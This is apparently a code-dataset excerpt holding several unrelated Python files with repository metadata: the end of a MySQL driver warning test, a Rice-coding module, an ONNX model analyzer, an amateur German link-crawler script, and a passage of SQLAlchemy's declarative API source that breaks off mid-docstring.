c = conn.cursor()
await c.execute("CREATE TABLE test_load_local (a INTEGER, b INTEGER)")
filename = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'data',
'load_local_warn_data.txt')
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
await c.execute(
("LOAD DATA LOCAL INFILE '{0}' INTO TABLE " +
"test_load_local FIELDS TERMINATED BY ','").format(filename)
)
self.assertEqual(w[0].category, Warning)
expected_message = "Incorrect integer value"
if expected_message not in str(w[-1].message):
self.fail("%r not in %r" % (expected_message, w[-1].message))
finally:
await c.execute("DROP TABLE test_load_local")
await c.aclose()
| 40.185567 | 83 | 0.568753 |
ca83080ce6d2d03fa1bf32afa8276321697f6b0a | 6,378 | py | Python | hypatia/text/ricecode.py | pfw/hypatia | 407cd62e4817c85188aa6abdf204c5aaff5ab570 | [
"ZPL-2.1"
] | null | null | null | hypatia/text/ricecode.py | pfw/hypatia | 407cd62e4817c85188aa6abdf204c5aaff5ab570 | [
"ZPL-2.1"
] | null | null | null | hypatia/text/ricecode.py | pfw/hypatia | 407cd62e4817c85188aa6abdf204c5aaff5ab570 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Rice coding (a variation of Golomb coding)
Based on a Java implementation by Glen McCluskey described in a Usenix
;login: article at
http://www.usenix.org/publications/login/2000-4/features/java.html
McCluskey's article explains the approach as follows. The encoding
for a value x is represented as a unary part and a binary part. The
unary part is a sequence of 1 bits followed by a 0 bit. The binary
part encodes some of the lower bits of x-1.
The encoding is parameterized by a value m that describes how many
bits to store in the binary part. If most of the values are smaller
than 2**m then they can be stored in only m+1 bits.
Compute the length of the unary part, q, where
q = math.floor((x-1)/ 2 ** m)
Emit q 1 bits followed by a 0 bit.
Emit the lower m bits of x-1, treating x-1 as a binary value.
"""
import array
class BitArray(object):
def __init__(self, buf=None):
self.bytes = array.array("B")
self.nbits = 0
self.bitsleft = 0
self.tostring = self.bytes.tostring
def __getitem__(self, i):
byte, offset = divmod(i, 8)
mask = 2 ** offset
if self.bytes[byte] & mask:
return 1
else:
return 0
def __setitem__(self, i, val):
byte, offset = divmod(i, 8)
mask = 2 ** offset
if val:
self.bytes[byte] |= mask
else:
self.bytes[byte] &= ~mask
def __len__(self):
return self.nbits
def append(self, bit):
"""Append a 1 if bit is true or 1 if it is false."""
if self.bitsleft == 0:
self.bytes.append(0)
self.bitsleft = 8
self.__setitem__(self.nbits, bit)
self.nbits += 1
self.bitsleft -= 1
def __getstate__(self):
return self.nbits, self.bitsleft, self.tostring()
def __setstate__(self, nbits_bitsleft_s):
nbits, bitsleft, s = nbits_bitsleft_s
self.bytes = array.array("B", s)
self.nbits = nbits
self.bitsleft = bitsleft
class RiceCode(object):
def __init__(self, m):
"""Constructor a RiceCode for m-bit values."""
if not (0 <= m <= 16):
raise ValueError("m must be between 0 and 16")
self.init(m)
self.bits = BitArray()
self.len = 0
def init(self, m):
self.m = m
self.lower = (1 << m) - 1
self.mask = 1 << (m - 1)
def append(self, val):
"""Append an item to the list."""
if val < 1:
raise ValueError("value >= 1 expected, got %s" % repr(val))
val -= 1
# emit the unary part of the code
q = val >> self.m
for i in range(q):
self.bits.append(1)
self.bits.append(0)
# emit the binary part
r = val & self.lower
mask = self.mask
while mask:
self.bits.append(r & mask)
mask >>= 1
self.len += 1
def __len__(self):
return self.len
def tolist(self):
"""Return the items as a list."""
l = []
i = 0 # bit offset
binary_range = range(self.m)
for j in range(self.len):
unary = 0
while self.bits[i] == 1:
unary += 1
i += 1
assert self.bits[i] == 0
i += 1
binary = 0
for k in binary_range:
binary = (binary << 1) | self.bits[i]
i += 1
l.append((unary << self.m) + (binary + 1))
return l
def tostring(self):
"""Return a binary string containing the encoded data.
The binary string may contain some extra zeros at the end.
"""
return self.bits.tostring()
def __getstate__(self):
return self.m, self.bits
def __setstate__(self, m_bits):
m, bits = m_bits
self.init(m)
self.bits = bits
def encode(m, l):
c = RiceCode(m)
for elt in l:
c.append(elt)
assert c.tolist() == l
return c
def encode_deltas(l):
if len(l) == 1:
return l[0], []
deltas = RiceCode(6)
deltas.append(l[1] - l[0])
for i in range(2, len(l)):
deltas.append(l[i] - l[i - 1])
return l[0], deltas
def decode_deltas(start, enc_deltas):
deltas = enc_deltas.tolist()
l = [start]
for i in range(1, len(deltas)):
l.append(l[i - 1] + deltas[i])
l.append(l[-1] + deltas[-1])
return l
def _print(x, newline=True):
import sys
fmt = newline and "%s\n" or "%s"
sys.stdout.write(fmt % x)
def test():
import random
for size in [10, 20, 50, 100, 200]:
l = [random.randint(1, size) for i in range(50)]
c = encode(random.randint(1, 16), l)
assert c.tolist() == l
for size in [10, 20, 50, 100, 200]:
l = range(random.randint(1, size), size + random.randint(1, size))
t = encode_deltas(l)
l2 = decode_deltas(*t)
assert l == l2
if l != l2:
_print(l)
_print(l2)
def pickle_efficiency():
import pickle
import random
for m in [4, 8, 12]:
for size in [10, 20, 50, 100, 200, 500, 1000, 2000, 5000]:
for elt_range in [10, 20, 50, 100, 200, 500, 1000]:
l = [random.randint(1, elt_range) for i in range(size)]
raw = pickle.dumps(l, 1)
enc = pickle.dumps(encode(m, l), 1)
_print("m=%2d size=%4d range=%4d" % (m, size, elt_range), False)
_print("%5d %5d" % (len(raw), len(enc)), False)
if len(raw) > len(enc):
_print("win")
else:
_print("lose")
if __name__ == "__main__":
test()
| 28.221239 | 80 | 0.541549 |
669e41eb636b442629c2447231e8fe9c017a7d11 | 2,130 | py | Python | onnx_analyzer/analyzer.py | ksang/onnx-analyzer | 35f95eea570ffb6a77e45113dc0e507eb654bc12 | [
"MIT"
] | null | null | null | onnx_analyzer/analyzer.py | ksang/onnx-analyzer | 35f95eea570ffb6a77e45113dc0e507eb654bc12 | [
"MIT"
] | null | null | null | onnx_analyzer/analyzer.py | ksang/onnx-analyzer | 35f95eea570ffb6a77e45113dc0e507eb654bc12 | [
"MIT"
] | null | null | null | import os
import onnx
import re
import onnx_analyzer
import pandas as pd
from pandas import ExcelWriter
import matplotlib.pyplot as plt
def analyze_single(model_path: str, calculate_macs=False) -> list:
model = onnx.load(model_path)
params = onnx_analyzer.count_param(model)
ops, macs = onnx_analyzer.count_op(model)
return[(model_path, params, ops, macs)]
def analyze(path: str, calculate_macs=False) -> list:
results = []
for files in os.listdir(path):
if files.endswith('.onnx'):
results += analyze_single(os.path.join(path, files), calculate_macs)
else:
continue
return results
def excel_sheetname(model_path: str) -> str:
model_name = os.path.basename(model_path)
return re.sub('[^A-Za-z0-9\._]+', '', model_name)[:30]
def report(results: list, excel: str, vis: str):
if vis:
fig, axs = plt.subplots(len(results))
fig.set_size_inches(8,6*len(results))
if excel:
excel_writer = ExcelWriter(excel, engine='xlsxwriter')
for i, (model_path, params, ops, macs) in enumerate(results):
print("Results for model: {}".format(model_path))
print("params: {}".format(params))
print("op statistics:")
ops_df = pd.DataFrame({'op_type': ops.keys(), 'count': ops.values()})
ops_df['percent'] = (ops_df['count'] /
ops_df['count'].sum()) * 100
print(ops_df)
if vis:
ops_df.plot.bar(x='op_type', y='count', ax=axs[i])
axs[i].set_title(model_path)
if excel:
ops_df.to_excel(excel_writer,
sheet_name=excel_sheetname(model_path))
if vis:
plt.subplots_adjust(left=0.1,
bottom=0.1,
right=0.9,
top=0.9,
wspace=0.4,
hspace=0.6)
print("Saving visualizations to: {}".format(vis))
plt.savefig(vis)
if excel:
print("Saving dataframes as excel to: {}".format(excel))
excel_writer.save()
| 33.809524 | 80 | 0.575587 |
4ad66e1a41c9fdfdcd4f172bace61b19a7bd4ed6 | 6,279 | py | Python | Python/Buch_ATBS/Teil_2/Kapitel_11_Webscraping/09_sammle_alle_links_einer_website/09_sammle_alle_links_einer_website_versuch_2.py | Apop85/Scripts | e71e1c18539e67543e3509c424c7f2d6528da654 | [
"MIT"
] | null | null | null | Python/Buch_ATBS/Teil_2/Kapitel_11_Webscraping/09_sammle_alle_links_einer_website/09_sammle_alle_links_einer_website_versuch_2.py | Apop85/Scripts | e71e1c18539e67543e3509c424c7f2d6528da654 | [
"MIT"
] | 6 | 2020-12-24T15:15:09.000Z | 2022-01-13T01:58:35.000Z | Python/Buch_ATBS/Teil_2/Kapitel_11_Webscraping/09_sammle_alle_links_einer_website/09_sammle_alle_links_einer_website_versuch_2.py | Apop85/Scripts | 1d8dad316c55e1f1343526eac9e4b3d0909e4873 | [
"MIT"
] | null | null | null | # 09_sammle_alle_links_einer_website.py
# Dieses Script soll eine beliebige Webseite nach links in allen Unterseiten der Webseite suchen
# und in einem File übersichtlich speichern
import requests, bs4, os, logging, re
logging.basicConfig(level=logging.ERROR, format='%(asctime)s - %(levelname)s - %(message)s')
os.chdir(os.path.dirname(__file__))
# Globals
site_links={}
site_counter={}
used_path={}
save_file=r'.\Websitelinks.txt'
def choose_website():
global save_file, base_name, crawl_loop_number
crawl_loop_number=-3
print('Zu durchsuchende Webseite angeben:')
website_choice=input()
save_file_write=open(save_file, 'w')
save_file_write.write(website_choice+'\n'+'~'*len(website_choice)+'\n\n')
save_file_write.close()
search_pattern=re.compile(r'(http://|https://)?(www\.)?([\w]+\.[\w]{2,3}.*)')
base_name=search_pattern.findall(website_choice)
base_name=list(base_name[0])
for entry in range(len(base_name)):
if entry == 0 and base_name[entry] == '':
base_name[entry]='https://'
base_name=''.join(base_name)
website_choice=''.join(base_name)
site_links.setdefault('base', base_name+'/')
crawl_loop(website_choice)
def crawl_loop(url_name):
global save_file, base_name, crawl_loop_number, site_links, site_counter, used_path
crawl_loop_number+=3
try:
if len(site_links) > 1:
del site_links[crawl_loop_number]
breakpoint
except Exception:
None
url_content=check_url(url_name)
if url_content != None:
bs4_container=bs4.BeautifulSoup(url_content.text, features='html.parser')
else:
return
site_links.setdefault(crawl_loop_number, [])
site_counter.setdefault(crawl_loop_number, 0)
used_path.setdefault(crawl_loop_number, url_name)
for class_a_object in bs4_container.find_all('a', href=True):
if 'http' in class_a_object['href']:
site_links[crawl_loop_number]+=[class_a_object['href'].strip('/')]
else:
site_links[crawl_loop_number]+=['/'+class_a_object['href'].strip('/')]
for entry in site_links[crawl_loop_number]:
save_file_append=open(save_file, 'a')
save_file_append.write('-'*crawl_loop_number+entry+'\n')
save_file_append.close()
slashes_in_entry=len(entry.split('/'))
site_counter[crawl_loop_number]=slashes_in_entry
if 'Bash' in entry:
breakpoint
if 'http' not in entry and 'www' not in entry and not '#toc' in entry and '/' != entry:
if base_name in entry or '/' in entry or '#' in entry:
if '#' in entry or '/' in entry:
for i in range(len(entry)):
chunk_size=len(entry)-i
if entry[:chunk_size] in used_path[crawl_loop_number][-chunk_size:]:
if i == len(entry)-1:
new_url=used_path[crawl_loop_number]+entry
elif len(entry.split('/')) <= 2 and crawl_loop_number > 0:
if used_path[crawl_loop_number-3]+entry != url_name:
new_url=used_path[crawl_loop_number]+entry
else:
new_url=used_path[crawl_loop_number]
elif i == 0 and entry == used_path[crawl_loop_number][-len(entry):]:
new_url=used_path[crawl_loop_number]
elif len(entry.split('/')) <= 2 and crawl_loop_number == 0:
new_url=used_path[crawl_loop_number]+entry
else:
chunk_location=len(entry)-i
new_url=used_path[crawl_loop_number][:-chunk_location]+entry
breakpoint
break
elif i == len(entry)-1:
new_url=used_path[crawl_loop_number]+entry
# if crawl_loop_number == 0:
# new_url=used_path[crawl_loop_number]+'/'+entry.strip('/')
# logging.info('Neue URL gefunden:'+new_url)
# else:
# new_url=used_path[crawl_loop_number-3]+entry
# logging.info('Neue URL gefunden:'+new_url)
# new_url=used_path[crawl_loop_number]+'/'+entry.strip('/')
# logging.info('Neue URL gefunden:'+new_url)
# if len(new_url) < len(base_name):
# new_url=base_name+entry
# breakpoint
else:
if base_name in entry:
new_url=entry
else:
continue
logging.info('Neue URL gefunden:'+new_url)
check_value=check_if_ignored(new_url)
if base_name in new_url and check_value == False:
logging.info('Starte neuen Loop in der Tiefe: '+str(crawl_loop_number/3+1))
crawl_loop(new_url)
crawl_loop_number-=3
elif base_name in new_url and crawl_loop_number == 0:
logging.info('Starte neuen Loop in der Tiefe: '+str(crawl_loop_number/3+1))
crawl_loop(new_url)
crawl_loop_number-=3
else:
breakpoint
del site_links[crawl_loop_number]
del site_counter[crawl_loop_number]
def check_url(url_name):
url_content=requests.get(url_name)
try:
url_content.raise_for_status()
return url_content
except Exception:
logging.error('URL Fehlerhaft: '+url_name)
return None
def check_if_ignored(new_url):
global site_links
max_try=len(site_links)-1
attempt=0
fragment='/'+'/'.join(new_url.split('/')[-1:])
for url_list in site_links.values():
if max_try == attempt:
return False
elif new_url in url_list:
return True
elif fragment in url_list:
return True
else:
attempt+=1
return False
while True:
choose_website()
# for i in range(len(entry)):
# url_name[-i-len(entry):]
# entry[]
# /Apop85/Scripts
# blabla/Apop85/Scripts | 41.309211 | 97 | 0.581781 |
54e927ee470a0e9950478dc7a73b1d2509c1ab5b | 34,907 | py | Python | venv/Lib/site-packages/sqlalchemy/orm/decl_api.py | geksogen/FastAPI_exampels | 441e4ea1ebfde984958deac115f60c4d0110d5b2 | [
"CC0-1.0"
] | null | null | null | venv/Lib/site-packages/sqlalchemy/orm/decl_api.py | geksogen/FastAPI_exampels | 441e4ea1ebfde984958deac115f60c4d0110d5b2 | [
"CC0-1.0"
] | null | null | null | venv/Lib/site-packages/sqlalchemy/orm/decl_api.py | geksogen/FastAPI_exampels | 441e4ea1ebfde984958deac115f60c4d0110d5b2 | [
"CC0-1.0"
] | null | null | null | # ext/declarative/api.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Public API functions and helpers for declarative."""
from __future__ import absolute_import
import itertools
import re
import weakref
from . import attributes
from . import clsregistry
from . import exc as orm_exc
from . import instrumentation
from . import interfaces
from . import mapper as mapperlib
from .base import _inspect_mapped_class
from .decl_base import _add_attribute
from .decl_base import _as_declarative
from .decl_base import _declarative_constructor
from .decl_base import _DeferredMapperConfig
from .decl_base import _del_attribute
from .decl_base import _mapper
from .descriptor_props import SynonymProperty as _orm_synonym
from .. import exc
from .. import inspection
from .. import util
from ..sql.schema import MetaData
from ..util import hybridmethod
from ..util import hybridproperty
def has_inherited_table(cls):
"""Given a class, return True if any of the classes it inherits from has a
mapped table, otherwise return False.
This is used in declarative mixins to build attributes that behave
differently for the base class vs. a subclass in an inheritance
hierarchy.
.. seealso::
:ref:`decl_mixin_inheritance`
"""
for class_ in cls.__mro__[1:]:
if getattr(class_, "__table__", None) is not None:
return True
return False
class DeclarativeMeta(type):
def __init__(cls, classname, bases, dict_, **kw):
# early-consume registry from the initial declarative base,
# assign privately to not conflict with subclass attributes named
# "registry"
reg = getattr(cls, "_sa_registry", None)
if reg is None:
reg = dict_.get("registry", None)
if not isinstance(reg, registry):
raise exc.InvalidRequestError(
"Declarative base class has no 'registry' attribute, "
"or registry is not a sqlalchemy.orm.registry() object"
)
else:
cls._sa_registry = reg
if not cls.__dict__.get("__abstract__", False):
_as_declarative(reg, cls, dict_)
type.__init__(cls, classname, bases, dict_)
def __setattr__(cls, key, value):
_add_attribute(cls, key, value)
def __delattr__(cls, key):
_del_attribute(cls, key)
def synonym_for(name, map_column=False):
"""Decorator that produces an :func:`_orm.synonym`
attribute in conjunction with a Python descriptor.
The function being decorated is passed to :func:`_orm.synonym` as the
:paramref:`.orm.synonym.descriptor` parameter::
class MyClass(Base):
__tablename__ = 'my_table'
id = Column(Integer, primary_key=True)
_job_status = Column("job_status", String(50))
@synonym_for("job_status")
@property
def job_status(self):
return "Status: %s" % self._job_status
The :ref:`hybrid properties <mapper_hybrids>` feature of SQLAlchemy
is typically preferred instead of synonyms, which is a more legacy
feature.
.. seealso::
:ref:`synonyms` - Overview of synonyms
:func:`_orm.synonym` - the mapper-level function
:ref:`mapper_hybrids` - The Hybrid Attribute extension provides an
updated approach to augmenting attribute behavior more flexibly than
can be achieved with synonyms.
"""
def decorate(fn):
return _orm_synonym(name, map_column=map_column, descriptor=fn)
return decorate
class declared_attr(interfaces._MappedAttribute, property):
"""Mark a class-level method as representing the definition of
a mapped property or special declarative member name.
:class:`_orm.declared_attr` is typically applied as a decorator to a class
level method, turning the attribute into a scalar-like property that can be
invoked from the uninstantiated class. The Declarative mapping process
looks for these :class:`_orm.declared_attr` callables as it scans classe,
and assumes any attribute marked with :class:`_orm.declared_attr` will be a
callable that will produce an object specific to the Declarative mapping or
table configuration.
:class:`_orm.declared_attr` is usually applicable to mixins, to define
relationships that are to be applied to different implementors of the
class. It is also used to define :class:`_schema.Column` objects that
include the :class:`_schema.ForeignKey` construct, as these cannot be
easily reused across different mappings. The example below illustrates
both::
class ProvidesUser(object):
"A mixin that adds a 'user' relationship to classes."
@declared_attr
def user_id(self):
return Column(ForeignKey("user_account.id"))
@declared_attr
def user(self):
return relationship("User")
:class:`_orm.declared_attr` can also be applied to mapped classes, such as
to provide a "polymorphic" scheme for inheritance::
class Employee(Base):
id = Column(Integer, primary_key=True)
type = Column(String(50), nullable=False)
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
@declared_attr
def __mapper_args__(cls):
if cls.__name__ == 'Employee':
return {
"polymorphic_on":cls.type,
"polymorphic_identity":"Employee"
}
else:
return {"polymorphic_identity":cls.__name__}
To use :class:`_orm.declared_attr` inside of a Python dataclass
as discussed at :ref:`orm_declarative_dataclasses_declarative_table`,
it may be placed directly inside the field metadata using a lambda::
@dataclass
class AddressMixin:
__sa_dataclass_metadata_key__ = "sa"
user_id: int = field(
init=False, metadata={"sa": declared_attr(lambda: Column(ForeignKey("user.id")))}
)
user: User = field(
init=False, metadata={"sa": declared_attr(lambda: relationship(User))}
)
:class:`_orm.declared_attr` also may be omitted from this form using a
lambda directly, as in::
user: User = field(
init=False, metadata={"sa": lambda: relationship(User)}
)
.. seealso::
:ref:`orm_mixins_toplevel` - illustrates how to use Declarative Mixins
which is the primary use case for :class:`_orm.declared_attr`
:ref:`orm_declarative_dataclasses_mixin` - illustrates special forms
for use with Python dataclasses
""" # noqa E501
def __init__(self, fget, cascading=False):
super(declared_attr, self).__init__(fget)
self.__doc__ = fget.__doc__
self._cascading = cascading
def __get__(desc, self, cls):
# the declared_attr needs to make use of a cache that exists
# for the span of the declarative scan_attributes() phase.
# to achieve this we look at the class manager that's configured.
manager = attributes.manager_of_class(cls)
if manager is None:
if not re.match(r"^__.+__$", desc.fget.__name__):
# if there is no manager at all, then this class hasn't been
# run through declarative or mapper() at all, emit a warning.
util.warn(
"Unmanaged access of declarative attribute %s from "
"non-mapped class %s" % (desc.fget.__name__, cls.__name__)
)
return desc.fget(cls)
elif manager.is_mapped:
# the class is mapped, which means we're outside of the declarative
# scan setup, just run the function.
return desc.fget(cls)
# here, we are inside of the declarative scan. use the registry
# that is tracking the values of these attributes.
declarative_scan = manager.declarative_scan
reg = declarative_scan.declared_attr_reg
if desc in reg:
return reg[desc]
else:
reg[desc] = obj = desc.fget(cls)
return obj
@hybridmethod
def _stateful(cls, **kw):
return _stateful_declared_attr(**kw)
@hybridproperty
def cascading(cls):
"""Mark a :class:`.declared_attr` as cascading.
This is a special-use modifier which indicates that a column
or MapperProperty-based declared attribute should be configured
distinctly per mapped subclass, within a mapped-inheritance scenario.
.. warning::
The :attr:`.declared_attr.cascading` modifier has several
limitations:
* The flag **only** applies to the use of :class:`.declared_attr`
on declarative mixin classes and ``__abstract__`` classes; it
currently has no effect when used on a mapped class directly.
* The flag **only** applies to normally-named attributes, e.g.
not any special underscore attributes such as ``__tablename__``.
On these attributes it has **no** effect.
* The flag currently **does not allow further overrides** down
the class hierarchy; if a subclass tries to override the
attribute, a warning is emitted and the overridden attribute
is skipped. This is a limitation that it is hoped will be
resolved at some point.
Below, both MyClass as well as MySubClass will have a distinct
``id`` Column object established::
class HasIdMixin(object):
@declared_attr.cascading
def id(cls):
if has_inherited_table(cls):
return Column(
ForeignKey('myclass.id'), primary_key=True
)
else:
return Column(Integer, primary_key=True)
class MyClass(HasIdMixin, Base):
__tablename__ = 'myclass'
# ...
class MySubClass(MyClass):
""
# ...
The behavior of the above configuration is that ``MySubClass``
will refer to both its own ``id`` column as well as that of
``MyClass`` underneath the attribute named ``some_id``.
.. seealso::
:ref:`declarative_inheritance`
:ref:`mixin_inheritance_columns`
"""
return cls._stateful(cascading=True)
class _stateful_declared_attr(declared_attr):
def __init__(self, **kw):
self.kw = kw
def _stateful(self, **kw):
new_kw = self.kw.copy()
new_kw.update(kw)
return _stateful_declared_attr(**new_kw)
def __call__(self, fn):
return declared_attr(fn, **self.kw)
def declarative_mixin(cls):
"""Mark a class as providing the feature of "declarative mixin".
E.g.::
from sqlalchemy.orm import declared_attr
from sqlalchemy.orm import declarative_mixin
@declarative_mixin
class MyMixin:
@declared_attr
def __tablename__(cls):
return cls.__name__.lower()
__table_args__ = {'mysql_engine': 'InnoDB'}
__mapper_args__= {'always_refresh': True}
id = Column(Integer, primary_key=True)
class MyModel(MyMixin, Base):
name = Column(String(1000))
The :func:`_orm.declarative_mixin` decorator currently does not modify
the given class in any way; it's current purpose is strictly to assist
the :ref:`Mypy plugin <mypy_toplevel>` in being able to identify
SQLAlchemy declarative mixin classes when no other context is present.
.. versionadded:: 1.4.6
.. seealso::
:ref:`orm_mixins_toplevel`
:ref:`mypy_declarative_mixins` - in the
:ref:`Mypy plugin documentation <mypy_toplevel>`
""" # noqa: E501
return cls
def declarative_base(
bind=None,
metadata=None,
mapper=None,
cls=object,
name="Base",
constructor=_declarative_constructor,
class_registry=None,
metaclass=DeclarativeMeta,
):
r"""Construct a base class for declarative class definitions.
The new base class will be given a metaclass that produces
appropriate :class:`~sqlalchemy.schema.Table` objects and makes
the appropriate :func:`~sqlalchemy.orm.mapper` calls based on the
information provided declaratively in the class and any subclasses
of the class.
The :func:`_orm.declarative_base` function is a shorthand version
of using the :meth:`_orm.registry.generate_base`
method. That is, the following::
from sqlalchemy.orm import declarative_base
Base = declarative_base()
Is equivalent to::
from sqlalchemy.orm import registry
mapper_registry = registry()
Base = mapper_registry.generate_base()
See the docstring for :class:`_orm.registry`
and :meth:`_orm.registry.generate_base`
for more details.
.. versionchanged:: 1.4 The :func:`_orm.declarative_base`
function is now a specialization of the more generic
:class:`_orm.registry` class. The function also moves to the
``sqlalchemy.orm`` package from the ``declarative.ext`` package.
:param bind: An optional
:class:`~sqlalchemy.engine.Connectable`, will be assigned
the ``bind`` attribute on the :class:`~sqlalchemy.schema.MetaData`
instance.
.. deprecated:: 1.4 The "bind" argument to declarative_base is
deprecated and will be removed in SQLAlchemy 2.0.
:param metadata:
An optional :class:`~sqlalchemy.schema.MetaData` instance. All
:class:`~sqlalchemy.schema.Table` objects implicitly declared by
subclasses of the base will share this MetaData. A MetaData instance
will be created if none is provided. The
:class:`~sqlalchemy.schema.MetaData` instance will be available via the
``metadata`` attribute of the generated declarative base class.
:param mapper:
An optional callable, defaults to :func:`~sqlalchemy.orm.mapper`. Will
be used to map subclasses to their Tables.
:param cls:
Defaults to :class:`object`. A type to use as the base for the generated
declarative base class. May be a class or tuple of classes.
:param name:
Defaults to ``Base``. The display name for the generated
class. Customizing this is not required, but can improve clarity in
tracebacks and debugging.
:param constructor:
Specify the implementation for the ``__init__`` function on a mapped
class that has no ``__init__`` of its own. Defaults to an
implementation that assigns \**kwargs for declared
fields and relationships to an instance. If ``None`` is supplied,
no __init__ will be provided and construction will fall back to
cls.__init__ by way of the normal Python semantics.
:param class_registry: optional dictionary that will serve as the
registry of class names-> mapped classes when string names
are used to identify classes inside of :func:`_orm.relationship`
and others. Allows two or more declarative base classes
to share the same registry of class names for simplified
inter-base relationships.
:param metaclass:
Defaults to :class:`.DeclarativeMeta`. A metaclass or __metaclass__
compatible callable to use as the meta type of the generated
declarative base class.
.. seealso::
:class:`_orm.registry`
"""
if bind is not None:
# util.deprecated_params does not work
util.warn_deprecated_20(
"The ``bind`` argument to declarative_base is "
"deprecated and will be removed in SQLAlchemy 2.0.",
)
return registry(
_bind=bind,
metadata=metadata,
class_registry=class_registry,
constructor=constructor,
).generate_base(
mapper=mapper,
cls=cls,
name=name,
metaclass=metaclass,
)
class registry(object):
"""Generalized registry for mapping classes.
The :class:`_orm.registry` serves as the basis for maintaining a collection
of mappings, and provides configurational hooks used to map classes.
The three general kinds of mappings supported are Declarative Base,
Declarative Decorator, and Imperative Mapping. All of these mapping
styles may be used interchangeably:
* :meth:`_orm.registry.generate_base` returns a new declarative base
class, and is the underlying implementation of the
:func:`_orm.declarative_base` function.
* :meth:`_orm.registry.mapped` provides a class decorator that will
apply declarative mapping to a class without the use of a declarative
base class.
* :meth:`_orm.registry.map_imperatively` will produce a
:class:`_orm.Mapper` for a class without scanning the class for
declarative class attributes. This method suits the use case historically
provided by the
:func:`_orm.mapper` classical mapping function.
.. versionadded:: 1.4
.. seealso::
:ref:`orm_mapping_classes_toplevel` - overview of class mapping
styles.
"""
def __init__(
self,
metadata=None,
class_registry=None,
constructor=_declarative_constructor,
_bind=None,
):
r"""Construct a new :class:`_orm.registry`
:param metadata:
An optional :class:`_schema.MetaData` instance. All
:class:`_schema.Table` objects generated using declarative
table mapping will make use of this :class:`_schema.MetaData`
collection. If this argument is left at its default of ``None``,
a blank :class:`_schema.MetaData` collection is created.
:param constructor:
Specify the implementation for the ``__init__`` function on a mapped
class that has no ``__init__`` of its own. Defaults to an
implementation that assigns \**kwargs for declared
fields and relationships to an instance. If ``None`` is supplied,
no __init__ will be provided and construction will fall back to
cls.__init__ by way of the normal Python semantics.
:param class_registry: optional dictionary that will serve as the
registry of class names-> mapped classes when string names
are used to identify classes inside of :func:`_orm.relationship`
and others. Allows two or more declarative base classes
to share the same registry of class names for simplified
inter-base relationships.
"""
lcl_metadata = metadata or MetaData()
if _bind:
lcl_metadata.bind = _bind
if class_registry is None:
class_registry = weakref.WeakValueDictionary()
self._class_registry = class_registry
self._managers = weakref.WeakKeyDictionary()
self._non_primary_mappers = weakref.WeakKeyDictionary()
self.metadata = lcl_metadata
self.constructor = constructor
self._dependents = set()
self._dependencies = set()
self._new_mappers = False
with mapperlib._CONFIGURE_MUTEX:
mapperlib._mapper_registries[self] = True
@property
def mappers(self):
"""read only collection of all :class:`_orm.Mapper` objects."""
return frozenset(manager.mapper for manager in self._managers).union(
self._non_primary_mappers
)
def _set_depends_on(self, registry):
if registry is self:
return
registry._dependents.add(self)
self._dependencies.add(registry)
def _flag_new_mapper(self, mapper):
mapper._ready_for_configure = True
if self._new_mappers:
return
for reg in self._recurse_with_dependents({self}):
reg._new_mappers = True
@classmethod
def _recurse_with_dependents(cls, registries):
todo = registries
done = set()
while todo:
reg = todo.pop()
done.add(reg)
# if yielding would remove dependents, make sure we have
# them before
todo.update(reg._dependents.difference(done))
yield reg
# if yielding would add dependents, make sure we have them
# after
todo.update(reg._dependents.difference(done))
@classmethod
def _recurse_with_dependencies(cls, registries):
todo = registries
done = set()
while todo:
reg = todo.pop()
done.add(reg)
# if yielding would remove dependencies, make sure we have
# them before
todo.update(reg._dependencies.difference(done))
yield reg
# if yielding would remove dependencies, make sure we have
# them before
todo.update(reg._dependencies.difference(done))
def _mappers_to_configure(self):
return itertools.chain(
(
manager.mapper
for manager in self._managers
if manager.is_mapped
and not manager.mapper.configured
and manager.mapper._ready_for_configure
),
(
npm
for npm in self._non_primary_mappers
if not npm.configured and npm._ready_for_configure
),
)
def _add_non_primary_mapper(self, np_mapper):
self._non_primary_mappers[np_mapper] = True
def _dispose_cls(self, cls):
clsregistry.remove_class(cls.__name__, cls, self._class_registry)
def _add_manager(self, manager):
self._managers[manager] = True
assert manager.registry is None
manager.registry = self
def configure(self, cascade=False):
"""Configure all as-yet unconfigured mappers in this
:class:`_orm.registry`.
The configure step is used to reconcile and initialize the
:func:`_orm.relationship` linkages between mapped classes, as well as
to invoke configuration events such as the
:meth:`_orm.MapperEvents.before_configured` and
:meth:`_orm.MapperEvents.after_configured`, which may be used by ORM
extensions or user-defined extension hooks.
If one or more mappers in this registry contain
:func:`_orm.relationship` constructs that refer to mapped classes in
other registries, this registry is said to be *dependent* on those
registries. In order to configure those dependent registries
automatically, the :paramref:`_orm.registry.configure.cascade` flag
should be set to ``True``. Otherwise, if they are not configured, an
exception will be raised. The rationale behind this behavior is to
allow an application to programmatically invoke configuration of
registries while controlling whether or not the process implicitly
reaches other registries.
As an alternative to invoking :meth:`_orm.registry.configure`, the ORM
function :func:`_orm.configure_mappers` function may be used to ensure
configuration is complete for all :class:`_orm.registry` objects in
memory. This is generally simpler to use and also predates the usage of
:class:`_orm.registry` objects overall. However, this function will
impact all mappings throughout the running Python process and may be
more memory/time consuming for an application that has many registries
in use for different purposes that may not be needed immediately.
.. seealso::
:func:`_orm.configure_mappers`
.. versionadded:: 1.4.0b2
"""
mapperlib._configure_registries({self}, cascade=cascade)
def dispose(self, cascade=False):
"""Dispose of all mappers in this :class:`_orm.registry`.
After invocation, all the classes that were mapped within this registry
will no longer have class instrumentation associated with them. This
method is the per-:class:`_orm.registry` analogue to the
application-wide :func:`_orm.clear_mappers` function.
If this registry contains mappers that are dependencies of other
registries, typically via :func:`_orm.relationship` links, then those
registries must be disposed as well. When such registries exist in
